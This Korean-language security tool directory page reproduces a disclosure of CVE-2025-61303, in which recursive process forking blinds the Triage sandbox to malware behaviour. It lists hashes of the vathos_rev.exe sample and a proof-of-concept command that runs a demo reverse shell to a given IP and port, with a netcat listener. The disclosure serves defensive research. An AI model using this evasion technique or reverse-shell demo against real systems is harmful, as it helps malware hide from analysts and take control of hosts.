Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-61303 — 심각한 취약점 (9.8) - RecordedFuture Triage 동적 분석 엔진은 샘플이 매우 높은 볼륨의 재귀적 프로세스 포크를 생성할 때 악의적인 행위를 기록하지 못할 수 있으며, 이로 인해 일관되지 않거나 누락된 행동 보고서가 발생합니다. | Kitploit
도구/GitHubGitHub/egkritsis/cve-2025-61303
Dynamic Analysis (Sandboxing)Vulnerability AnalysisExploitationMalware AnalysisPapers & ResearchLearning & Education
GitHubegkritsis/cve-2025-61303

CVE-2025-61303

심각한 취약점 (9.8) - RecordedFuture Triage 동적 분석 엔진은 샘플이 매우 높은 볼륨의 재귀적 프로세스 포크를 생성할 때 악의적인 행위를 기록하지 못할 수 있으며, 이로 인해 일관되지 않거나 누락된 행동 보고서가 발생합니다.

저장소 보기
249개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-61303 - RecordedFuture Triage: 재귀적 프로세스 포크를 통한 분석 거부

설명

RecordedFuture Triage Sandbox Windows 10 build 2004 및 Windows 10 LTSC 2021은 Windows 동작 분석 엔진에 심각한 취약점을 포함하고 있어, 제출된 악성코드 샘플이 탐지를 회피하고 분석 거부를 유발할 수 있습니다. 이 취약점은 샘플이 재귀적으로 많은 수의 자식 프로세스를 생성하여 높은 로그 볼륨을 발생시키고 시스템 리소스를 고갈시킬 때 발생합니다. 그 결과, PowerShell 실행 및 리버스 셸 활동을 포함한 주요 악성 행위가 기록되거나 보고되지 않을 수 있어 분석가를 오도하고 샌드박스 분석 결과의 무결성과 가용성을 손상시킵니다.


CVSS 점수

CVSS v3.1: 9.8 (Critical)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


저자 / 연구자

  • Evgenios Gkritsis — 그리스 아테네 경제경영대학교 정보학과
  • Constantinos Patsakis — 그리스 피레우스 대학교 정보학과
  • George Stergiopoulos — 그리스 아테네 경제경영대학교 정보학과

상세 정보

샘플 vathos_rev.exe (SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b)는 RecordedFuture Triage의 Windows 동작 분석 엔진에서 분석 거부 상태를 보여줍니다.
Windows 10 구성에서 실행될 때, 이 샘플은 수천 개의 자식 프로세스를 재귀적으로 생성하여 프로세스 추적 및 로깅 리소스를 고갈시킵니다. 결과적으로 샌드박스는 최소한의 동작 데이터만 보고하고 주요 악성 행위를 기록하지 못합니다.


Windows 10 v2004 환경

  • 플랫폼: win10v2004-20250610-en
  • 아키텍처: x64
  • 최대 커널 시간: 104s
  • 최대 네트워크 시간: 213s
  • 보고된 동작 점수: 1/10
  • 탐지된 시그니처: “Suspicious use of WriteProcessMemory” (64 IoCs)
  • 관찰된 동작:
    • vathos_rev.exe의 지속적인 프로세스 재귀
    • PowerShell 실행 또는 리버스 셸 활동 기록 없음
    • 제한된 네트워크 트래픽 (표준 DNS 및 HTTP 요청만)
    • C2 콜백 또는 페이로드 텔레메트리 캡처되지 않음

Windows 10 LTSC 2021 환경

  • 플랫폼: win10ltsc2021-20250619-en
  • 아키텍처: x64
  • 최대 커널 시간: 105s
  • 최대 네트워크 시간: 215s
  • 보고된 동작 점수: 1/10
  • 탐지된 시그니처: “Suspicious use of WriteProcessMemory” (64 IoCs)
  • 관찰된 프로세스 활동:
    • vathos_rev.exe의 지속적인 프로세스 재귀
    • PowerShell 실행 또는 리버스 셸 활동 기록 없음
    • 제한된 네트워크 트래픽 (표준 DNS 및 HTTP 요청만)
    • C2 콜백 또는 페이로드 텔레메트리 캡처되지 않음

두 Windows 10 샌드박스 환경 모두에서, 악성코드가 호스트에서 이러한 동작을 실행했음에도 불구하고 폭발 시험은 예상된 PowerShell 실행 및 리버스 셸 단계를 캡처하지 못했습니다.

샌드박스의 동작 분석 엔진은 재귀적 프로세스 생성으로 인해 포화 상태가 되어 텔레메트리가 잘리거나 누락되었습니다.

이는 분석 거부 취약점을 확인하며, 동작 엔진이 높은 재귀 및 로그 볼륨 하에서 악성 활동을 보고하지 못하여 위음성 및 불완전한 포렌식 출력을 초래합니다.

공개 보고서 참조:
https://tria.ge/250822-qfystshk51


영향

이는 RecordedFuture Triage의 분석 거부 취약점으로, 동적 분석 엔진이 동작 활동을 캡처하거나 보고하지 못하게 할 수 있습니다. 악용 시 공격자는 동작 탐지를 우회하고 불완전하거나 누락된 분석 보고서를 생성할 수 있습니다.

주요 영향

  • 탐지 회피: 악성 행위가 기록되지 않아 위협이 양성으로 보일 수 있습니다.
  • 잘못된 신뢰: 텔레메트리가 누락된 낮은 점수 분석은 분석가를 오도할 수 있습니다.
  • 재사용 가능한 회피: 기법을 로더/드로퍼에 내장하여 캠페인 전반에 재사용할 수 있습니다.
  • 악용 용이성: 깊은 전문 지식 없이도 재현 가능하여 대규모 남용 위험 증가.

하위 영향

  • 놓친 IOCs
  • 고급 위협의 오분류
  • 불완전한 포렌식 타임라인

영향을 받는 제품

  • 제품: RecordedFuture Triage (동적 분석 플랫폼)
  • 영향을 받는 구성 요소: Windows 동작 분석 엔진
  • 악성코드 샘플: vathos_rev.exe
    • SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b
    • MD5: dca2fc8f69f6493c7a9c1ce9a68b2454
    • SHA1: 9b4688ba4788e34bce47d91b0accc98d33dbf8d2
    • SHA512: 924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b
    • 크기: 270 KB

관찰된 취약 폭발(공개 Triage 보고서)

Windows 10 LTSC 2021 환경

  • 보고서 ID: 250822-qfystshk51
  • 플랫폼: win10ltsc2021-20250619-en
  • 아키텍처: x64
  • 제출 시간: 2025-08-22 13:12 UTC
  • 보고 시간: 2025-08-22 13:18 UTC

Windows 10 Version 2004 환경

  • 보고서 ID: 250822-qfystshk51
  • 플랫폼: win10v2004-20250610-en
  • 아키텍처: x64
  • 제출 시간: 2025-08-22 13:12 UTC
  • 보고 시간: 2025-08-22 13:18 UTC

참고: 엔진 빌드 및 내부 버전 세부 정보는 RecordedFuture에서 공개하지 않습니다.
모든 관찰은 RecordedFuture의 Triage 플랫폼(제출 250822-qfystshk51)의 재현 가능한 공개 폭발을 기반으로 합니다.


개념 증명 (PoC)

요약 (간략)

제공된 데모는 매우 높은 프로세스 볼륨과 깊게 중첩된 런타임 활동을 생성하여 분석 거부(DoA) 조건을 재현합니다. 데모는 많은 자식 프로세스를 생성하고 최종 PowerShell 리버스 셸 단계 전에 다중 라운드 XOR 복호화를 수행합니다. 취약한 Triage Windows 10 이미지에서는 최종 페이로드 단계가 기록되지 않거나 잘리지만, 다른 이미지(예: Windows 11)에서는 전체 동작을 캡처합니다.

실행 방법

root@kitploit:~
poc/vathos_demo.exe <IP> <PORT>

지정된 IP/포트에서 리스너(예: nc -lvp 4444)를 시작하여 연결 시도를 관찰하세요. 데모는 매우 많은 수의 프로세스를 생성하고 다중 라운드 XOR 복호화를 수행하여 PowerShell 리버스 셸 단계로 이어집니다. 영향을 받는 Triage 구성에서는 샘플이 호스트에서 실행되더라도 최종 페이로드 단계가 기록되지 않을 수 있습니다.

그림 1 - Triage 개요 대시보드 그림 1 - Triage 개요 대시보드

그림 2 - Windows 10 v2004 동작 보고서 (최소 텔레메트리 / DoA 예) 그림 2 - Windows 10 v2004 동작 보고서 (최소 텔레메트리 / DoA 예)

그림 3 - Windows 10 LTSC 2021 동작 보고서 (최소 텔레메트리 / DoA 예) 그림 3 - Windows 10 LTSC 2021 동작 보고서 (최소 텔레메트리 / DoA 예)

그림 4 - Windows 10 LTSC에 기록된 프로세스 예시 (익명 처리, 모든 프로세스가 기록된 것은 아님) — 분석 로그 → 프로세스 그림 4 - Windows 10 LTSC에 기록된 프로세스 예시 (익명 처리, 모든 프로세스가 기록된 것은 아님) — 분석 로그 → 프로세스


참고 자료

  • Public Triage analysis: https://tria.ge/250822-qfystshk51
  • https://www.cve.org/CVERecord?id=CVE-2025-61303

도구 다운로드